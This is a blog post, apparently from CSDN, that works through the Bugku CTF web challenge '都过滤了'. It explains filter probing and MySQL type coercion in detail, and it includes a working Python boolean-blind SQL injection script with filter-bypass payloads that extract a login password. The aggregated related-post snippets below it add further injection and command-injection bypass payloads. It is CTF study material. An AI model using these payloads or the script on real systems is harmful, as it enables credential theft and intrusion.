bugku 都过滤了

最新推荐文章于 2025-10-17 16:39:15 发布
原创 最新推荐文章于 2025-10-17 16:39:15 发布 · 945 阅读 · 26 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #运维

我对这道题的思路完全断掉,本篇是看了其他博主的解答,自己再捋一下思路。原文地址:bugku web 都过滤了_bugku 都过滤了-优快云博客

思路

1. 弱密码尝试,发现admin是用户名,密码未知
2. 尝试万能密码,a'or 1=1#,提示非法字符


进行字符单独测试,发现 # , 空格 * · --  or and union 被过滤,包括url编码也不行。

() ' " = - +没被过滤

sql注入的思路是注入点、注入类型、构造payload、服务器响应

第一步:寻找注入点

抓包观察http头没有发现异常,观察源代码没发现异常。

然后再看服务器响应,提交注入一共产生3种响应:非法字符、用户名错、密码错。无其他报错信息。

用户名错:单独报错,说明不是select * from user where username=用户名 and password=密码一句查询语句完成的代码,必然有单独验证用户名的代码,

select  * from user where username=用户名

那么可以尝试用户名作为注入点,但无论单双引号,结果都是用户名错误,没有其他报错信息。用户名错误说明要么单双引号被转义后,与admin形成新字符串导致报错;要么是后端统一将报错信息设置为用户名错误。

下一步思路是验证引号是否被转义。如过被转义,则引号闭合后依然会报用户名错误;如过没被转义,则引号闭合后会报密码错误。

这里该博主做了如下2个验证:

admin'-1-'

admin'-0-'

此处原理:mysql字符串与数字进行计算时,会先尝试将字符串转为数字,再完成计算。admin的从左往右全是字符,最终转换为0,此时查询语句相当于

select * from user where username=0-0-''

最后的''空也被转为0,最终变成0-0-0=0,查询语句最终变成

select * from user where uname=0

在mysql中,where字句需要一个布尔值(任何非零数值都被解释为true),uname=0,uname字符串在与0计算时,也是先尝试转换为数字,所以先转换成0=0,由此变成

select * from user where 0=0
select * from user where true

where子句恒为真(查询结果集为全部数据,不会报错),此时用户名的查询响应结果是密码错误,说明单引号未被转义,由此确定单引号闭合uname存在注入点。回看admin'0-1-'也可以验证,where子句恒为假,查询结果为空集,此时会引起报错(用户名错误)

第二步:确定注入类型

根据本题特点,页面无报错回显(排除报错注入),无直接回显(排除联合查询注入、排除堆叠查询),非二次非带外,因此

可以使用布尔盲注或时间盲注。

时间盲注

参考的博主用了布尔盲注,既然是学习,那就我来看一下时间盲注

admin'-1-'

把sleep和if方法插入到1这个位置,

IF(condition, sleep(), value_if_false)

问题是if函数必须用到, 但是,已经被过滤了;

再用case when..then..else..end代替if,但是空格被过滤了;

再尝试用(1=1)*123 + (1=0)*456代替IF(1=1, 123, 456),但是*被过滤了;

一点活路不给啊!放弃

布尔盲注

布尔盲注正常的思路是获取数据库

猜数据库长度

猜数据库每个字符

猜数据库有多少张表

猜第一张表名长度

猜第一张表名的每个字符

猜第n张表名
猜目标表的总字段数
猜字段名
猜字段值

总之很麻烦,但是这道题实际上是不能这么做的,因为猜表名时直接就被过滤了,根本进行不下去。

length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=1

到这里其实正经的思路就断了.包括我参考的博主,思路也是一下跳到猜字段名了,这不合理。我去bugku买了题解,题解的意思就是在php里定义了passwd变量,用来存密码,不是从数据库里读的,只需要直接猜就好了,这思维太跳跃了,而且题目也没给这方面提示。

如过把passwd是php变量当做已知条件,则思路变成:

猜密码长度

挨个猜密码字符

import requests

session = requests.session()
targetUrl = 'http://117.72.52.127:11319/login.php'
printable_ascii_chars = [
    '$', '(', ')', '+', ',', '-', '.', '0', '1', '2', '3', '4', '5', '6', '7',
    '8', '9', ':', ';', '<', '=', '>', '?', '@', 'A', 'B', 'C', 'D', 'E', 'F',
    'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U',
    'V', 'W', 'X', 'Y', 'Z', '[', ']', '^', '_', '`', '{', '}', '~', 'a', 'b',
    'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q',
    'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
]

# # 密码长度
# for i in range(1, 99):
#     uname = "uname=admin'-(length(passwd)=" + str(i) + ")-'"
#     response = session.post(targetUrl, data={"uname": uname, "passwd": 1})
#     if ('username error' in response.text):
#         print("密码长度是", i)
#         break

#猜密码字符
flag = ''
for k in range(1, 33):
    for j in printable_ascii_chars:
        uname = "admin'-(ascii(mid(REVERSE(MID((passwd)from(-" + str(
            k) + ")))from(-1)))=" + str(ord(j)) + ")-'"
        response2 = session.post(targetUrl, data={"uname": uname, "passwd": 1})
        if ('username error' in response2.text):
            flag += str(j)
            print("密码:", flag)
            break

猜出的密码是2a18488206a1da2c7e50cb1f8f88ccd4,再去MD5解密(但是解不出来)。

我还以为是我代码写错爆出错误的密码,但打开题目作者题解,用他的代码跑,依然是2a18488206a1da2c7e50cb1f8f88ccd4,跟他的答案都不一样。说明作者应该是改过题目,而且改错了。

8个月前其他做题者得到的是完全不同的MD5,按照他的MD5解密,就能得到正确的密码了

所以虽然题目错了,但是注入的思路还是非常值得学习的。

Coder_Chang
关注
Bugku WEB 都过滤
qq_41696858的博客
07-25 1140
这题呢,网上有很多解法,那都是这个题目没有完善之前的,现在来说已经修复的差不多了,像以前的直接/flag当然行不通,源码泄露啥的也被删了 严格来说,其实这是一道sql注入题 打开场景,啥提示没有,那就dirsearch扫一波,在一番查找过后,发现images文件夹下有一张图片,那就是作者给的提示,也就是不是数字开头的字符串在比较时会自动转成0 那么他的提示里0=0也就是永真,所以可以爆出所有的用户名 友情小tips:三个0异或不是1,而是0,不要想当然,这就是一个存粹的数学问题 最后一个式子给出了如何有条件
whois ——Bugku
qq_73985955的博客
07-04 399
我们访问一下query.php源代码,发现在query.php下面有两个属性host和query,随后使用shell_exec调用本机whois,host和query被直接拼接进去,很容易想到多命令执行。其中我们观察到host和query都进行了正则过滤,host属性只允许数字、字母和“.”,“-”的输入。这里我们可以使用换行符“\n”绕过,它的url编码是%0a(这里是数字零,不是字母o),query后面接命令,我们查看一下目录下面有什么。我们观察到它叫我们cat它一下,那我们就来cat一下。
Bugku,Web:都过滤
Pai_Space
07-26 496
Bugku,Web:都过滤
BugKu Web渗透 之 都过滤
最新发布
cai_huaer的博客
10-17 871
aa'-(mid((SELECT(password)FROM(admin))from(1))='a')-',提示illegal character!aa'-(mid((SELECT(passwd)FROM(admin))from(1))='a')-',提示password error!一样,用常见的表名去爆破。那么,当admin表不存在,报错时,肯定无法比较字符串是否为a,那么返回就是username error。1.输入用户名admin'-0-',密码admin,提示:password error!
bugku-web-都过滤
qq_75121443的博客
04-18 600
这里几乎没有其他线索,现在能想到的有两种,SQL注入和爆破。别说,页面还挺帅,这里所有链接点都是假的。得到最终密码bugkuctf。可以用{}来代替空格作用。得到账号为admin。
bugku web 都过滤
m0_58189778的博客
08-19 3065
题目:都过滤了 知识点:SQL注入、SQL注入绕过、命令执行绕过 工具: 解题: 确定题型: 点开链接: 是一个登录框,再查看源码,发现该界面除了登录指向一个php脚本外,其他连接都是无效的,所以此题的玄机应该就在登录这里。这种情况下,常见的是两种,一是弱口令爆破,二是SQL注入攻击,我没有尝试第一种,因为看了别人的提示确定了这是一个SQL注入(注意,网上有很多非SQL注入的解题,这些是因为早期这个题目不完善留下的漏洞,现在经过完善后应该就只有SQL注入能够解题) 找注入点: .
Bugku CTF_Web——都过滤
weixin_71914594的博客
10-30 540
想到上一题也是账号admin提示密码错误。用shell重定向构造payload。password是bugkuctf。base64编码的/也被过滤了。账号应该还是admin。只有一个登录框可以用。其他功能界面都用不了。ls读半天读不到什么。
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
BUGKU--web详解
qq_49422880的博客
05-28 2264
web5-web?前言Web4Web5Web6Web7Web8game1Web11社工-伪造一级目录一级目录 前言   听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。 Web4   就是考察简单的代码审计,只需要传递的what的变量等于flag即可,于是我们可以构造一个payload,用win10的cmd发送,用Burpsuite抓包返包或则firefox的harbar也可以完成这个
CTF BugKu平台—(Web篇①)_ctf bugku web
2501_90392009的博客
01-31 1816
发现是一个一直在闪的页面 使用bp 抓包 发送到requencer --send 随便点几下在 到10.jpg 发现了flag。即num既不能是数字字符,但是要等于1,我们可以想到用科学计数法表示数字1,既不是纯数字,其值又等于1因此。这里的sign显示是加密的。这里是zMNTA,这里我好几次都是zM开头的 ==结束的,查看源代码。是一个弹窗 F12 找到一些线索,估计是编码,看了一下下面的评论知道是Unicode编码。通过url传入what的值,让其等于flag,直接构造url就得到flag。
bugku】web36 全都过滤了绝望吗?
EC_Carrot的博客
12-28 1407
进去是个登录界面,稍微按了按导航栏没什么用,猜测是注入! 输入用户admin密码任意,显示password错误 输入用户admin'密码任意,显示username错误 输入用户admin'#密码任意,发现给检测到入侵,那#用不了,试了试-和+也被过滤了 那这里就能看出是盲注了,放脚本: # -*- coding: utf-8 -*- import requests session = requests.Session() url="http://114.67.246.176:12012/login.php
Bugku_web_login3(关于有过滤的sql盲注)
silence1_的博客
09-01 702
Bugku_web_login3(SKCTF) 题目 题目链接:http://123.206.31.85:49167/ hint:基于布尔的SQL盲注 打开题目是一个登录框,先试试admin,admin,回显password error! 再试试admin’,admin,回显username does not exist 可见username是admin,再试试admin’# ,又回显pass...
ctf-WEB-都过滤
god_001的博客
05-09 1281
题目地址:跳转提示 打开网址,看到一个登陆页面: 首先随便输入用户名和密码,发现只报错显示用户名错误,因此推出后端先判断用户名,可能使用sql语句:SELECT * FROM tab_name WHERE uname=... 发现'#','-- ',' ','or','and','/*'都被过滤了 尝试判断闭合,发现用户名无论是admin'还是admin",都没有其他报错,先预设是单引号闭合 输入用户名为a'-'0,密码123 发现结果显示密码错误 可推出,确实是单引号闭合 原.
Bugku sql注入 基于布尔的SQL盲注 经典题where information过滤
m0_64180167的博客
10-16 1262
考核中遇到的题 爆出数据库 就完全不知道怎么做了这里拿到原题记录一下首先拿到登入界面我们来进行测试输入 admin 密码随便输入输入 admin123 密码随便输入发现了 这里admin是存在数据库中的 但是不存在就会回显不存在所以这里我们可以确定了 admin 是true的然后我们开始fuzz发现过滤了巨多。。。。。where information啥都是过滤然后我们一个一个绕过。
Bugku-CTF之sql注入2 (全都tm过滤了绝望吗?)
weixin_30593443的博客
07-04 1242
Day 38 sql注入2 200 http://123.206.87.240:8007/web2/ 全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,% ​ 本题要点:DS_Store源码泄露 用bp弱口令爆一波 没有结果~ 用御剑扫描后台 ...
什么是DS_Store?DS_Store源码泄露/bugku-web36(全都过滤了绝望吗?)
qq_45655564的博客
05-28 1777
什么是DS_Store .DS_Store(英文全称 Desktop Services Store)是一种由苹果公司的Mac OS X操作系统所创造的隐藏文件,目的在于存贮目录的自定义属性,例如文件们的图标位置或者是背景色的选择。相当于 Windows 下的 desktop.ini。 DS_Store文件泄露 如果开发/设计人员将.DS_Store上传部署到线上环境,可能造成文件目录结构泄漏,特别是备份文件、源代码文件。 工具 源码地址:https://github.com/lijiejie/ds_
Bugku CTF web36(Web)
ChaoYue_miku的博客
03-19 455
0、打开网页,查看题目描述 描  述:全都过滤了绝望吗? 根据描述,说明是盲注 1、编写python脚本,运行获取密码 import requests session = requests.Session() url="http://114.67.246.176:15649//login.php" flag='' for i in range(1,250): left=32 right=128 mid=(left+right)//2 .
bugku ctf sql注入2
qq_42777804的博客
08-08 3185
全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,% 骑士 特别特别  绝望         输入什么都不行     直接 在网址后面 添加   flag  (老师指点)    敲回车 发现会多了个这个 哈哈哈   记事本打开    发现这不就是  flag  吗   如下  flag{sql_iNJEct_comMon3600!} 提交即可...
eavl bugku
03-31
引用[2]和[3]都涉及“bugku-eval”,可能是指某个具体的CTF题目,比如在Bugku平台上的eval挑战,通常这类题目会考察代码注入或安全漏洞。 接下来,我需要确认用户的需求:他们可能想了解eval函数的安全风险,或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值